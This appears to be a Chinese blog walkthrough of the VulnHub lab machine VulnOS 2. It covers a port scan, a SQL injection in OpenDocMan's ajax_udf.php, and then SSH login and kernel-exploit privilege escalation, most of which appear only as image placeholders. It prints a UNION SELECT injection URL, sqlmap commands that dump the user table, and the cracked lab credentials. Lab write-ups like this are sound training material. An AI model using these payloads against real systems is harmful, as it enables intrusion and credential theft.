小白的靶机VulnHub-PwnLab

靶机地址:https://www.vulnhub.com/entry/vulnos-2,147/

这台靶机 开机遇到一些小麻烦

把这个 对号去掉就可以了

在这里插入图片描述
还是 一如既往 使用桥接

开机 界面 就是个这

在这里插入图片描述
在这里插入图片描述确定本次 靶机的ip地址:192.168.0.109

确定 开放的端口 和详细信息

在这里插入图片描述

22–>ssh服务

80–>Web服务器

6667–>IRC服务器

直接上 页面访问 康康呗

在这里插入图片描述

源代码 F12 一顿 找 没啥有用的信息

在这里插入图片描述
但是 通常 都是有可用的信息啊

然后 很坑

原页面 如上 当你全选之后

发现隐藏的目录 !!! 坑死了…

在这里插入图片描述进行访问

在这里插入图片描述
发现它的版本

在这里插入图片描述
从中 找寻 有什么 可以利用的漏洞

在这里插入图片描述
复制下来,康康这个

在这里插入图片描述
进行查看 发现有sql注入

在这里插入图片描述
进行访问 存在sql注入的页面

http://192.168.0.109/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

在这里插入图片描述
这里可以看到mysql的版本号

直接上sqlmap呗

爆库
python2 sqlmap.py -u “http://192.168.0.109/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” --dbs --level=5 --risk=3

爆表

python2 sqlmap.py -u “http://192.168.0.109/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -D jabcd0cs --tables
爆列
python2 sqlmap.py -u “http://192.168.0.109/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -D jabcd0cs -T odm_user --dump

获得两个账号

Username : webmin
Password : webmin1980
Username : guest
Password :guest

进行 ssh登录呗

在这里插入图片描述进来之后 经典三重命令呗

在这里插入图片描述
在进行 三重命令

在这里插入图片描述
在这里插入图片描述
Linux VulnOSv2 3.13.0-24

Linux 3.13.0-24-generic i686

Distributor ID: Ubuntu
Description: Ubuntu 14.04.4 LTS

接下来 就是提权了呗

查找 可用的exp

在这里插入图片描述在这里插入图片描述
中间我换了一个目录

在这里插入图片描述

在这里插入图片描述

利用python 进入tty 靶机进行下载
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
感觉 就很简单 轻松拿下了

猜你喜欢

转载自blog.csdn.net/wo41ge/article/details/112444033
今日推荐